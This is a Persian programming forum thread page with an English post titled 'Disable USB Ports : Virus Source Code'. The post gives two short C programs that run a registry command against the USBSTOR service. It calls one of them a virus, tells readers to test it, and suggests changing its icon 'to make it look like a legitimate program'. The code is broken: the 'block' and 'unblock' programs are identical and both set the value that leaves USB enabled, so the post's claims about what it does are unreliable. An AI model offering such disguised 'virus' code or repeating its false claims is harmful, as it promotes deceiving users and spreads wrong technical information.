• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 28 رای - 3.04 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: برنامه ای برای قفل کردن پورتهای USB کامپیوتر
حالت خطی
#4
Disable USB Ports : Virus Source Code
undefined undefined


In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.


Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Copy the below Given Code in Notepad & Save it as "block_usb.c"

کد:
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}

2. Again Copy the below Given Code in Notepad & Save it as "unblock_usb.c"

کد:
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}
3. Compile the Above two saved files using a C Compiler before you can run it.
4. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
5. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
6. You can also change the icon of this file to make it look like a legitimate program.

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پیام‌های این موضوع
RE: برنامه ای برای قفل کردن پورتهای USB کامپیوتر - توسط Amin_Mansouri - 02-12-2012، 11:19 AM

موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  راهنمای در خصوص برنامه ی زیر...جمع اعداد salim_a` 1 3,828 05-01-2016، 05:34 PM
آخرین ارسال: Amin_Mansouri
  فیلتر کردن دیتا گرید aghamali 4 4,984 11-15-2014، 10:50 AM
آخرین ارسال: aghamali
  دانلود قسمتی از یه سایت در برنامه aghamali 1 3,319 11-07-2014، 09:40 PM
آخرین ارسال: Amin_Mansouri
  جدا کردن حروف عکس aleas 1 3,456 05-29-2014، 11:06 AM
آخرین ارسال: saeedh
  سورس کد زوم کردن بر روی عکس ویژوال بیسیک 6 Amin_Mansouri 1 7,005 04-26-2014، 11:11 PM
آخرین ارسال: سلام
  بهترین سورس برای تشخیص اتصال به اینترنت sajad-kh 0 2,756 04-08-2014، 07:33 PM
آخرین ارسال: sajad-kh
  پر کردن فیلد های یک سایت sajad-kh 6 8,073 01-28-2014، 08:13 PM
آخرین ارسال: sajad-kh
  دانلود فایل اکسس برای ساخت دیکشنری sajad-kh 0 4,912 01-28-2014، 01:24 PM
آخرین ارسال: sajad-kh
  آموزش ساخت اسپمر تبلیغاتی برای بلاگفا Amin_Mansouri 14 22,678 12-27-2013، 08:46 PM
آخرین ارسال: SnipeR
  ساخت برنامه پرتابل از برنامه های نوشته شده sajad-kh 2 4,293 09-15-2013، 06:14 AM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 1 مهمان